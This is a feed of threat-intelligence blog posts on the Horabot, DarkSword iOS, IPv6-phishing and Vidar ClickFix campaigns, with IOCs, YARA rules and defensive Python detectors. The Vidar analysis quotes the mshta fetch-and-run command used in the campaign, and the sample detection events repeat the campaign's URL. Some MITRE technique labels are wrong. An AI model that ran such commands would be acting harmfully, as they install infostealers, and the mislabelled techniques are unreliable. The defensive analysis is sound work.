<li><p><strong>Audit Clipboard Operations:</strong> While difficult to implement at scale, security teams should be aware that web-based "copy-to-clipboard" events are being weaponized.</p>
</li>
</ol>
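<p>Recommendations 1 and 3 above, monitoring <code>mshta.exe</code> for external network targets and alerting when a browser or the Run dialog launches it, can be expressed as a small rule over process-creation events. The following Python is an added example and not Kaspersky's or SecLookup's code. It uses a simplified, constructed <code>key=value</code> event shape standing in for Sysmon Event ID 1 records; because the Run dialog is hosted by <code>explorer.exe</code>, that process appears as the parent of <code>mshta.exe</code> in the Stage 2 execution described above. The parent list and severity labels are this example's own choices; the known-bad domains come from the IOC list in this post.</p>

```python
"""Alert on mshta.exe launched by a browser or the Run dialog with a remote URL.

Added example, not Kaspersky's or SecLookup's code. Events are constructed in
a simplified Sysmon Event ID 1 shape: 'Key=Value' fields separated by '|'.
"""
import re
from urllib.parse import urlparse

# Parents that should not legitimately spawn mshta.exe against a remote URL.
# explorer.exe covers the Win+R Run dialog; the rest are common browsers.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Delivery domains from this post's IOC list (defanging brackets removed).
KNOWN_BAD_DOMAINS = {"evs.grupotuis.buzz", "thea.gruposhac.space", "cgf.midasx.site"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_event(line):
    """Parse one 'Key=Value|Key=Value' record into a dict (constructed format)."""
    fields = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event.

    high:   mshta.exe fetching from a domain in the campaign IOC list
    medium: mshta.exe given any remote URL by a browser or the Run dialog
    """
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if image != "mshta.exe":
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if not urls:
        return None                                  # local .hta, not this pattern
    hosts = {urlparse(u).hostname for u in urls}
    if hosts.intersection(KNOWN_BAD_DOMAINS):
        return "high"
    if parent in SUSPICIOUS_PARENTS:
        return "medium"
    return None


# Constructed sample events. The first reuses the URL quoted in Stage 2 above;
# the second uses a placeholder domain that is not on the IOC list.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta.exe https://evs.grupotuis.buzz/0capcha17/",
    "EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta https://cdn.example-placeholder.test/verify",
    "EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\msiexec.exe"
    "|CommandLine=mshta.exe C:\\Program Files\\Vendor\\setup.hta",
    "EventID=1|Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad.exe https://evs.grupotuis.buzz/0capcha17/",
]


def scan_events(lines):
    """Return [(severity, parent_image, command_line)] for every alerting event."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            alerts.append((severity, event.get("ParentImage", ""), event.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for severity, parent, cmd in scan_events(SAMPLE_EVENTS):
        print(severity, parent, cmd)
```

<p>An installer launching <code>mshta.exe</code> on a local <code>.hta</code> file produces no alert, which keeps the rule quiet for the legitimate use the first recommendation leaves room for, while any remote URL handed to <code>mshta.exe</code> from the Run dialog is surfaced even when the domain is not yet on a blocklist.</p>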
<h2>References</h2>
<ul>
<li><a href="https://securelist.com/horabot-campaign/119033/">The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico</a> by Domenico Caldarella, Mateus Salgado, Securelist (Kaspersky GReAT)</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Unmasking DarkSword: The Proliferation of a New iOS Full-Chain Exploit Across Global Threat Actors]]></title><description><![CDATA[The mobile threat landscape has reached a new level of sophistication with the discovery of "DarkSword," a potent iOS exploit chain capable of achieving full device compromise through a sequence of ze]]></description><link>https://blog.seclookup.com/unmasking-darksword-the-proliferation-of-a-new-ios-full-chain-exploit-across-global-threat-actors</link><guid isPermaLink="true">https://blog.seclookup.com/unmasking-darksword-the-proliferation-of-a-new-ios-full-chain-exploit-across-global-threat-actors</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 19 Mar 2026 19:28:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/694bb6c6-5a68-4e97-8a16-de4c816c1cdc.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The mobile threat landscape has reached a new level of sophistication with the discovery of "DarkSword," a potent iOS exploit chain capable of achieving full device compromise through a sequence of zero-day vulnerabilities. First identified by the Google Threat Intelligence Group (GTIG) and Mandiant, DarkSword represents a troubling trend in the cyber arms market: the rapid proliferation of high-end surveillance tools across disparate threat actors, ranging from commercial surveillance vendors (CSVs) to state-sponsored espionage groups.</p>
<p>At SecLookup, our threat research team has been actively tracking the infrastructure associated with DarkSword. Our platform successfully identified and blocked the core delivery domains—including <code>static.cdncounter[.]net</code></p>
<h2>Executive Summary</h2>
<p>DarkSword is an iOS full-chain exploit that leverages six distinct vulnerabilities to bypass the robust security architecture of modern Apple devices. Active since at least November 2025, the exploit chain targets iOS versions 18.4 through 18.7. What makes DarkSword particularly notable is its adoption by multiple independent threat groups, including the suspected Russian espionage group UNC6353. The campaign has a global reach, with confirmed targets in Saudi Arabia, Turkey, Malaysia, and Ukraine. Following a successful exploit, attackers deploy one of three specialized malware families: GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER.</p>
<h2>Threat Analysis: The DarkSword Lifecycle</h2>
<p>The DarkSword exploit chain is a masterpiece of offensive engineering, designed to bypass the multiple layers of the iOS sandbox and kernel protections. Its lifecycle typically follows a "watering hole" or highly targeted phishing model.</p>
<h3>Initial Access and Delivery</h3>
<p>Attackers deploy DarkSword primarily through drive-by compromise (MITRE ATT&amp;CK T1189). In several observed campaigns, legitimate websites were compromised to host malicious JavaScript. This script, often masquerading as a benign tracking or widget utility (e.g., <code>widgets.js</code>), performs initial environment fingerprinting to ensure the target device is a vulnerable iPhone or iPad running the targeted iOS versions (18.4–18.7).</p>
<p>One of the primary delivery domains identified is <code>static.cdncounter[.]net</code>. This domain was used to serve the initial stage of the exploit, acting as a gateway for the more complex stages of the attack.</p>
<h3>The Exploit Chain</h3>
<p>The DarkSword chain utilizes six vulnerabilities. While the specific CVEs vary based on the target’s patch level, the chain generally follows this sequence:</p>
<ol>
<li><p><strong>Remote Code Execution (RCE):</strong> A vulnerability in WebKit is used to gain initial execution within the browser sandbox.</p>
</li>
<li><p><strong>Sandbox Escape:</strong> Two vulnerabilities are typically used to break out of the WebContent process.</p>
</li>
<li><p><strong>Kernel Elevation of Privilege (EoP):</strong> Three vulnerabilities, including memory corruption bugs in the iOS kernel, are used to gain read/write primitives and eventually full kernel-level execution.</p>
</li>
</ol>
<h3>Post-Compromise: The "GHOST" Malware Families</h3>
<p>Once the kernel is compromised, the attackers deploy a final-stage payload. DarkSword has been observed delivering three distinct malware families, likely tailored to the specific goals of the threat actor using the chain:</p>
<ul>
<li><p><strong>GHOSTBLADE:</strong> A modular implant focused on data exfiltration from third-party messaging apps (Signal, WhatsApp, Telegram).</p>
</li>
<li><p><strong>GHOSTKNIFE:</strong> A streamlined surveillance tool optimized for persistence and credential harvesting from the iOS Keychain.</p>
</li>
<li><p><strong>GHOSTSABER:</strong> A sophisticated backdoor with advanced capabilities for real-time location tracking and microphone/camera activation.</p>
</li>
</ul>
<h2>Actor Attribution and Proliferation</h2>
<p>The most striking aspect of DarkSword is its widespread use. Historically, full-chain zero-day exploits were the exclusive domain of a single elite actor. However, DarkSword mirrors the "Coruna" exploit kit model, where a central developer (likely a commercial surveillance vendor) sells the exploit to multiple clients.</p>
<p>UNC6353, a group linked to Russian intelligence operations, has been observed integrating DarkSword into their watering hole operations targeting Ukrainian entities. Simultaneously, the same exploit chain was detected in campaigns targeting high-profile individuals in the Middle East and Southeast Asia, attributed to different, likely state-aligned, commercial entities. This "exploit-as-a-service" model significantly lowers the barrier to entry for state-sponsored espionage.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique ID</th>
<th>Technique Name</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1189</td>
<td>Drive-by Compromise</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1203</td>
<td>Exploitation for Client Execution</td>
</tr>
<tr>
<td><strong>Privilege Escalation</strong></td>
<td>T1068</td>
<td>Exploitation for Privilege Escalation</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1211</td>
<td>Exploitation for Defense Evasion</td>
</tr>
<tr>
<td><strong>Discovery</strong></td>
<td>T1082</td>
<td>System Information Discovery</td>
</tr>
<tr>
<td><strong>Exfiltration</strong></td>
<td>T1646</td>
<td>Exfiltration Over Client-to-Cloud Service</td>
</tr>
</tbody></table>
<h2>SecLookup Detection</h2>
<p>SecLookup’s proactive threat intelligence platform was actively detecting and blocking the infrastructure associated with DarkSword. The domain <code>static.cdncounter[.]net</code> was flagged as malicious by our scanners due to its involvement in suspicious JavaScript delivery and its connections to known exploit delivery patterns.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Malicious Domains</h3>
<pre><code class="language-text">static.cdncounter[.]net
snapshare[.]chat
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">62.72.21.10
72.60.98.48
</code></pre>
<h3>File Hashes (SHA-256)</h3>
<pre><code class="language-text">2e5a56beb63f21d9347310412ae6efb29fd3db2d3a3fc0798865a29a3c578d35
</code></pre>
<h3>URLs</h3>
<pre><code class="language-text">https://snapshare[.]chat/&lt;redacted&gt;
https://static.cdncounter[.]net/widgets.js?uhfiu27fajf2948fjfefaa42
https://static.cdncounter[.]net/assets/index.html
</code></pre>
<h3>Email Addresses</h3>
<pre><code class="language-text">anotherresource@frame.html
</code></pre>
<h2>Detection Rules</h2>
<h3>YARA Rules</h3>
<p>The following rules can be used to scan for DarkSword toolmarks in memory or extracted payloads.</p>
<pre><code class="language-yara">rule iOS_DarkSword_Payload_Toolmarks {
    meta:
        description = "Detects toolmarks and malware family names associated with the DarkSword iOS exploit chain."
        threat_actor = "UNC6353"
        malware_family = "GHOSTBLADE, GHOSTKNIFE, GHOSTSABER"
    strings:
        $s1 = "DarkSword" ascii wide
        $s2 = "GHOSTBLADE" ascii wide
        $s3 = "GHOSTKNIFE" ascii wide
        $s4 = "GHOSTSABER" ascii wide
    condition:
        (uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe) and (2 of them)
}

rule DarkSword_Delivery_Infrastructure {
    meta:
        description = "Detects references to the DarkSword delivery domain in files or memory."
    strings:
        $url = "static.cdncounter.net" ascii wide nocase
    condition:
        $url
}
</code></pre>
<h2>Recommendations</h2>
<p>To mitigate the risk of DarkSword and similar iOS exploit chains, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Update Immediately:</strong> Apple has released patches for the vulnerabilities leveraged by DarkSword. Ensure all iOS devices are updated to version 18.8 or higher (and ideally the latest version, 26.3, as mentioned in the findings).</p>
</li>
<li><p><strong>Enable Lockdown Mode:</strong> For high-risk individuals (journalists, activists, government officials), Apple’s "Lockdown Mode" significantly reduces the attack surface by disabling complex web features and blocking certain message attachments that are often used in these exploit chains.</p>
</li>
<li><p><strong>Network Monitoring:</strong> Block all traffic to the IOCs listed above. Implement DNS filtering to prevent devices from communicating with known exploit delivery domains like <code>cdncounter[.]net</code>.</p>
</li>
<li><p><strong>Endpoint Security:</strong> Utilize mobile threat defense (MTD) solutions that can detect anomalous process behavior or unauthorized kernel modifications.</p>
</li>
</ol>
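<p>The IOC lists in this post are defanged (<code>[.]</code> in place of a dot), so a blocklist or SIEM rule built from them has to refang first and then match on the whole domain, including subdomains, without tripping on look-alike names. The script below is an added example written for this post, not SecLookup tooling: it refangs the two domains listed above and scans a handful of constructed DNS resolver log lines (the log format and client addresses are made up for the demo).</p>

```python
"""Refang defanged IOC domains and match them against DNS query logs.

Added example, not SecLookup's own tooling. The IOC list is the one
from the post above; the DNS log lines and their format are constructed.
"""
from __future__ import annotations
import re

# Defanged domains exactly as listed in the IOC section of this post.
DEFANGED_IOCS = """
static.cdncounter[.]net
snapshare[.]chat
"""

# Constructed resolver log (hypothetical format: timestamp client 'query' name).
SAMPLE_DNS_LOG = """\
2026-04-15T10:01:02Z 10.0.0.21 query www.example.com
2026-04-15T10:01:05Z 10.0.0.21 query static.cdncounter.net
2026-04-15T10:01:09Z 10.0.0.37 query cdn.snapshare.chat
2026-04-15T10:02:11Z 10.0.0.37 query notsnapshare.chat
2026-04-15T10:02:40Z 10.0.0.40 query STATIC.CDNCOUNTER.NET.
"""

def refang(indicator: str) -> str:
    """Turn the usual analyst-safe notations back into a real, normalised domain."""
    return (indicator.strip().lower()
            .replace("[.]", ".")
            .replace("(.)", ".")
            .replace("[:]", ":")
            .replace("hxxp", "http")
            .rstrip("."))

def load_iocs(block: str) -> set[str]:
    """Parse a defanged IOC block (one indicator per line) into a refanged set."""
    return {refang(line) for line in block.splitlines() if line.strip()}

def domain_matches(query: str, iocs: set[str]) -> str | None:
    """Return the IOC that `query` equals or is a subdomain of, else None.

    The leading dot in the endswith() check keeps 'notsnapshare.chat'
    from matching 'snapshare.chat'."""
    q = query.lower().rstrip(".")  # trailing dot = absolute name in DNS logs
    for ioc in iocs:
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qname>\S+)$")

def scan_dns_log(log: str, iocs: set[str]) -> list[tuple[str, str, str]]:
    """Return (timestamp, client, matched_ioc) for every log line that hits an IOC."""
    hits = []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ioc = domain_matches(m["qname"], iocs)
        if ioc:
            hits.append((m["ts"], m["client"], ioc))
    return hits

if __name__ == "__main__":
    for ts, client, ioc in scan_dns_log(SAMPLE_DNS_LOG, load_iocs(DEFANGED_IOCS)):
        print(f"{ts} {client} -> {ioc}")
```

Three of the five constructed lines hit: the exact domain, a subdomain of <code>snapshare.chat</code>, and an upper-case absolute name with a trailing dot. The look-alike <code>notsnapshare.chat</code> does not, which is the check a naive <code>endswith()</code> on the bare IOC would get wrong.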
<h2>References</h2>
<ul>
<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/">The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors</a> by Google Threat Intelligence Group, Mandiant</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[IPv6 Obfuscation Tactics in Healthcare Phishing: Analyzing the "Free Toothbrush" Campaign]]></title><description><![CDATA[Executive Summary
A sophisticated phishing campaign targeting United Healthcare beneficiaries has recently resurfaced, utilizing a deceptive lure involving a premium Oral-B toothbrush to harvest sensi]]></description><link>https://blog.seclookup.com/ipv6-obfuscation-tactics-in-healthcare-phishing-analyzing-the-free-toothbrush-campaign</link><guid isPermaLink="true">https://blog.seclookup.com/ipv6-obfuscation-tactics-in-healthcare-phishing-analyzing-the-free-toothbrush-campaign</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 19 Mar 2026 05:02:24 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/f33115c5-7437-4a2c-bd62-80c03d178270.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>A sophisticated phishing campaign targeting United Healthcare beneficiaries has recently resurfaced, utilizing a deceptive lure involving a premium Oral-B toothbrush to harvest sensitive Personally Identifiable Information (PII) and credit card details. What distinguishes this campaign from previous iterations is the use of IPv6-mapped IPv4 addresses to obfuscate malicious destination URLs. By replacing standard domain names with IPv6 literals—specifically using the <code>::ffff:</code> notation—threat actors are evading basic link scanners and confusing analysts attempting to trace the traffic. <strong>SecLookup</strong> is actively monitoring this threat and has successfully identified and blocked the associated infrastructure. This post details the technical mechanisms of this evasion technique, the indicators of compromise (IOCs), and defensive recommendations for SOC teams and end-users.</p>
<h2>Threat Analysis</h2>
<h3>The Lure: Baiting and Impersonation</h3>
<p>The campaign leverages <strong>T1566.001 (Phishing: Spearphishing Link)</strong> by impersonating a trusted entity, United Healthcare. The lure, a "premium Oral-B iO toothbrush," is a classic example of <strong>T1566.002 (Spearphishing Link with File Attachment)</strong>, relying on the psychological principle of "Baiting" (offering something desirable for free to gain access to a system or network). This technique lowers the victim's guard, making them more likely to overlook security warnings.</p>
<h3>The Evasion: IPv6-Mapped Addressing</h3>
<p>Traditionally, phishers have relied on Azure Blob Storage or obfuscated domains. This campaign has pivoted to a more technical evasion method: <strong>IPv6-mapped IPv4 addresses</strong>.</p>
<p>In the provided examples, malicious links previously looked like standard URLs pointing to Azure storage. Now, they utilize the format <code>http://[::ffff:5111:8e14]/</code>. To the untrained eye, this looks like a valid URL, but the brackets <code>[...]</code> indicate an IPv6 literal. The <code>::ffff:</code> prefix is a standard mechanism used in IPv6 to represent IPv4 addresses within the IPv6 address space.</p>
<h4>Technical Breakdown</h4>
<p>The threat actor converts an IPv4 address into an IPv6 format to hide the underlying destination IP. Let's analyze the hex string <code>5111:8e14</code> provided in the example:</p>
<ol>
<li><p><strong>Hexadecimal Conversion:</strong> The string is split into two 16-bit segments: <code>5111</code> and <code>8e14</code>.</p>
</li>
<li><p><strong>Byte Unpacking:</strong> The last 32 bits of the address (the two trailing 16-bit groups, <code>5111:8e14</code>) are treated as four bytes, one per IPv4 octet.</p>
<ul>
<li><p><code>0x51</code> = 81 (Decimal)</p>
</li>
<li><p><code>0x11</code> = 17 (Decimal)</p>
</li>
<li><p><code>0x8e</code> = 142 (Decimal)</p>
</li>
<li><p><code>0x14</code> = 20 (Decimal)</p>
</li>
</ul>
</li>
<li><p><strong>Final IP:</strong> This results in the IPv4 address <strong>81.17.142.20</strong>.</p>
</li>
</ol>
<p>By routing traffic through this IPv6 mapping, the attackers obscure the IP address from basic URL inspection tools and some web proxies, forcing analysts to perform manual hex-to-decimal conversions to identify the malicious server.</p>
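<p>The hand conversion above generalises: any bracketed host of the form <code>[::ffff:x:y]</code> (or its dotted variant <code>[::ffff:81.17.142.20]</code>) is an IPv4-mapped IPv6 literal, and the standard library can unpack it without manual hex arithmetic. The script below is an added example, not code from the post or from Malwarebytes: it reproduces the post's two-group unpacking, decodes the URL quoted above with Python's <code>ipaddress</code> module, and runs a small finder over constructed message text that flags every bracketed-IPv6 URL, the check the recommendations section suggests for a SIEM.</p>

```python
"""Recover the IPv4 address behind an IPv6-mapped URL literal and flag such URLs.

Added example, not part of the original post. The first URL in the sample
is the one quoted in the post; the other lines are constructed.
"""
from __future__ import annotations
import ipaddress
import re
from urllib.parse import urlsplit

def manual_unpack(hex_groups: str) -> str:
    """The hand method from the post: two 16-bit hex groups -> four decimal octets."""
    hi, lo = (int(g, 16) for g in hex_groups.split(":"))
    return ".".join(str(b) for b in (hi >> 8, hi & 0xFF, lo >> 8, lo & 0xFF))

def mapped_ipv4(host: str) -> str | None:
    """Return the dotted IPv4 address if `host` is an IPv4-mapped IPv6 literal.

    Accepts both the hex form ('::ffff:5111:8e14') and the dotted form
    ('::ffff:81.17.142.20'); anything else (a name, a plain IPv6) yields None."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return str(addr.ipv4_mapped)
    return None

def decode_url(url: str) -> str | None:
    """Return the underlying IPv4 address for a URL whose host is an IPv6 literal."""
    host = urlsplit(url).hostname  # hostname strips the [...] around IPv6 literals
    return mapped_ipv4(host) if host else None

# Any http(s) URL whose host is a bracketed IPv6 literal.
URL_RE = re.compile(r"https?://\[[0-9a-fA-F:.]+\][^\s<>]*")

def flag_ipv6_literal_urls(text: str) -> list[tuple[str, str | None]]:
    """Find every bracketed-IPv6 URL in `text`; pair it with its mapped IPv4 or None.

    This is the SIEM-style check for '[' / '::ffff:' URLs from the recommendations."""
    return [(u, decode_url(u)) for u in URL_RE.findall(text)]

# Constructed sample text: the campaign's URL, its dotted twin, a plain IPv6
# literal (flagged but not mapped) and an ordinary hostname (not flagged).
SAMPLE_TEXT = """\
Claim your Oral-B iO: http://[::ffff:5111:8e14]/
Claim now: http://[::ffff:81.17.142.20]/offer
Docs: https://[2001:db8::1]/
Docs: https://example.com/
"""

if __name__ == "__main__":
    print("manual:", manual_unpack("5111:8e14"))
    for url, ip in flag_ipv6_literal_urls(SAMPLE_TEXT):
        print(f"{url} -> {ip or 'IPv6 literal, not IPv4-mapped'}")
```

Both <code>manual_unpack("5111:8e14")</code> and the <code>ipaddress</code> route give <code>81.17.142.20</code>, so the module can replace the hand conversion in an enrichment step. Note that a bracketed literal that is not <code>::ffff:</code>-mapped is still worth flagging: an IPv6 host in a marketing e-mail is unusual on its own.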
<h3>The Infrastructure</h3>
<p>The victims are directed to fast-rotating landing pages. The ultimate goal is not the toothbrush but the theft of credit card information under the guise of paying a "shipping fee" or confirming eligibility. Once the victim submits their card details, the data is transmitted to a backend server controlled by the threat actor.</p>
<h3>MITRE ATT&amp;CK Reference</h3>
<ul>
<li><p><strong>T1566.001:</strong> Phishing: Spearphishing Link</p>
</li>
<li><p><strong>T1071.001:</strong> Application Layer Protocol: Web Traffic</p>
</li>
<li><p><strong>T1548.001:</strong> Abuse Elevation Control Mechanism: SIDHijack (Potential) / Proxy (Mapping IPv6 to bypass restrictions)</p>
</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence platform has identified the following malicious infrastructure associated with this campaign. These indicators should be blocked immediately in network firewalls and email security gateways.</p>
<h3>Domains</h3>
<pre><code class="language-text">redirectofferid[.]pro
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">81.17.142.20
15.204.145.84
81.17.142.40
</code></pre>
<h3>Malicious URL Pattern</h3>
<pre><code class="language-text">http://[::ffff:5111:8e14]/
</code></pre>
<p><em>(Note: The hex string</em> <code>5111:8e14</code> <em>can be converted to the IP</em> <code>81.17.142.20</code> <em>as detailed above. Similar patterns using different hex values will map to other IPs in the attacker's infrastructure.)</em></p>
<h2>SecLookup Detection</h2>
<p><strong>SecLookup</strong> is actively detecting and blocking this threat. Our threat intelligence platform has updated our blocking lists to include the malicious domain <code>redirectofferid[.]pro</code> and the associated IP addresses <code>81.17.142.20</code>, <code>15.204.145.84</code>, and <code>81.17.142.40</code>.</p>
<h2>Recommendations</h2>
<h3>For Security Teams</h3>
<ol>
<li><p><strong>Update Blocking Rules:</strong> Ensure your email security gateway (ESG) and next-generation firewall (NGFW) include the IPs listed in the IOCs section.</p>
</li>
<li><p><strong>Monitor for IPv6 Literals:</strong> Configure SIEM alerts to flag for unusual URL patterns containing square brackets <code>[]</code> or the <code>::ffff:</code> prefix, as these are indicators of this specific obfuscation technique.</p>
</li>
<li><p><strong>Domain Reputation:</strong> Block the domain <code>redirectofferid[.]pro</code> immediately.</p>
</li>
</ol>
<h3>For End-Users</h3>
<ol>
<li><p><strong>Verify the Source:</strong> Always check the sender's email address carefully. Scammers often use slight misspellings or variations of legitimate domains (e.g., <code>united-healthcare-support[.]com</code> instead of <code>unitedhealthcare[.]com</code>).</p>
</li>
<li><p><strong>Hover Before Clicking:</strong> Before clicking a link, hover your mouse over it to see the actual destination URL. If you see a long string of characters that doesn't match the sender's domain, do not click.</p>
</li>
<li><p><strong>Do Not Pay Fees:</strong> If you receive a message claiming you need to pay a small shipping fee for a "free" item, it is a scam. Legitimate companies do not require payment to ship free gifts.</p>
</li>
<li><p><strong>Immediate Action if Compromised:</strong></p>
<ul>
<li><p>Contact your bank or credit card issuer immediately to cancel the card.</p>
</li>
<li><p>Dispute any unauthorized charges.</p>
</li>
<li><p>Run a full system scan with a reputable security product.</p>
</li>
</ul>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/scams/2026/03/phishers-hide-scam-links-with-ipv6-trick-in-free-toothbrush-emails">Phishers hide scam links with IPv6 trick in “free toothbrush” emails</a> by Malwarebytes Labs</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Analysis: Vidar Infostealer Campaigns Weaponize "ClickFix" Tactics via Compromised CMS]]></title><description><![CDATA[In the evolving landscape of cybercrime, the barrier to entry for distributing sophisticated malware is increasingly shifting from technical exploits to advanced social engineering. Recent findings an]]></description><link>https://blog.seclookup.com/analysis-vidar-infostealer-campaigns-weaponize-clickfix-tactics-via-compromised-cms</link><guid isPermaLink="true">https://blog.seclookup.com/analysis-vidar-infostealer-campaigns-weaponize-clickfix-tactics-via-compromised-cms</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Thu, 19 Mar 2026 05:00:36 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/f2657ff7-79a7-4318-9d2f-806d23e2b321.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In the evolving landscape of cybercrime, the barrier to entry for distributing sophisticated malware is increasingly shifting from technical exploits to advanced social engineering. Recent findings analyzed by the SecLookup Threat Research team, in conjunction with reports from Malwarebytes Labs, highlight a resurgence of the <strong>Vidar Infostealer</strong> being distributed via "ClickFix" tactics. This campaign leverages compromised WordPress websites across the globe—including Italy, France, the United States, and Brazil—to trick users into manually executing malicious commands. By mimicking legitimate security verification services like Cloudflare, threat actors bypass traditional browser-based sandbox protections, forcing the user to become the final link in the infection chain.</p>
<h2>Executive Summary</h2>
<p>The latest Vidar campaign demonstrates a sophisticated use of the "ClickFix" or "Fake CAPTCHA" technique. Rather than relying on automated browser vulnerabilities which are frequently patched, attackers exploit human psychology. Visitors to compromised WordPress sites are presented with a highly convincing "Verifying you are human" page. Under the guise of solving a CAPTCHA, the user is instructed to copy and paste a command into their Windows Run dialog or PowerShell terminal. This command initiates a chain of events that utilizes built-in Windows binaries—specifically <code>mshta.exe</code>—to download and execute the Vidar infostealer. SecLookup has been actively tracking this infrastructure and confirmed the malicious nature of key domains, such as <code>walwood.be</code>, associated with these delivery operations.</p>
<h2>Threat Analysis: The ClickFix Evolution</h2>
<p>The "ClickFix" technique represents a shift toward "browser-out" infections. Instead of a file downloading automatically (which triggers "Mark of the Web" warnings or EDR alerts upon execution), the attacker convinces the user that their browser is "broken" or needs verification.</p>
<h3>The Infection Vector: Compromised CMS</h3>
<p>The campaign primarily targets WordPress installations. Once a site is compromised—likely through credential stuffing or known plugin vulnerabilities—the attackers inject a script that redirects users to a fake Cloudflare verification page. This page is designed to appear identical to a legitimate "Under Attack Mode" or "Turnstile" challenge.</p>
<h3>Technical Chain: Abusing Mshta.exe</h3>
<p>When a user follows the instructions on the fake CAPTCHA page, they are typically told to press <code>Win+R</code>, paste a command, and hit enter. The command observed in this campaign follows a specific pattern:</p>
<p><code>mshta https://{compromised-website}/challenge/cf</code></p>
<p><strong>Mshta.exe</strong> (Microsoft HTML Application Host) is a legitimate Windows utility used to execute <code>.hta</code> files. Because it is a signed Microsoft binary, it is frequently used by threat actors as a "Living-off-the-Land" binary (LoLBin) to bypass application whitelisting. In this context, <code>mshta</code> fetches a remote HTA script from the compromised site's <code>/challenge/cf</code> directory. This script then executes an obfuscated payload that downloads the final Vidar installer, often in the form of an <code>.msi</code> file.</p>
<h3>Vidar Infostealer Capabilities</h3>
<p>Vidar is a prolific "stealer-as-a-service" malware that has been active since 2018. Once executed, it resides primarily in memory to evade file-based antivirus scanning. Its primary objectives include:</p>
<ul>
<li><p><strong>Credential Harvesting:</strong> Extracting usernames and passwords from over 30 different web browsers (Chrome, Firefox, Edge, etc.).</p>
</li>
<li><p><strong>Cryptocurrency Theft:</strong> Searching for local wallet files (e.g., Electrum, Ethereum, Exodus) and browser-based wallet extensions.</p>
</li>
<li><p><strong>Session Hijacking:</strong> Stealing browser cookies and authentication tokens to bypass Multi-Factor Authentication (MFA).</p>
</li>
<li><p><strong>System Profiling:</strong> Collecting hardware specs, IP addresses, and screenshots of the victim's desktop.</p>
</li>
<li><p><strong>Data Exfiltration:</strong> Once the data is staged, it is compressed into a ZIP file and sent to a remote Command and Control (C2) server.</p>
</li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<p>The TTPs observed in this campaign align with the following MITRE ATT&amp;CK techniques:</p>
<table>
<thead>
<tr>
<th>ID</th>
<th>Technique</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><strong>T1566.002</strong></td>
<td>Phishing: Spearphishing Link</td>
<td>Users are directed to compromised websites via various external vectors.</td>
</tr>
<tr>
<td><strong>T1204.001</strong></td>
<td>User Execution: Malicious Link</td>
<td>The attack relies on the user manually entering commands provided by the site.</td>
</tr>
<tr>
<td><strong>T1218.005</strong></td>
<td>System Binary Proxy Execution: Mshta</td>
<td>Use of <code>mshta.exe</code> to execute malicious HTA files.</td>
</tr>
